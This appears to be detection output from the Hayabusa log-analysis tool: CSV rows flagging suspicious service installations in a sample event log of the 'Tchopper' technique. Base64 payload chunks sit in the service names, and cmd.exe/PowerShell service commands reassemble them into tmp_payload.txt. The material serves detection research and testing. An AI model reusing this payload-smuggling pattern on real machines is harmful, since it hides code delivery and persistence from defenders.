Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:42.889 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
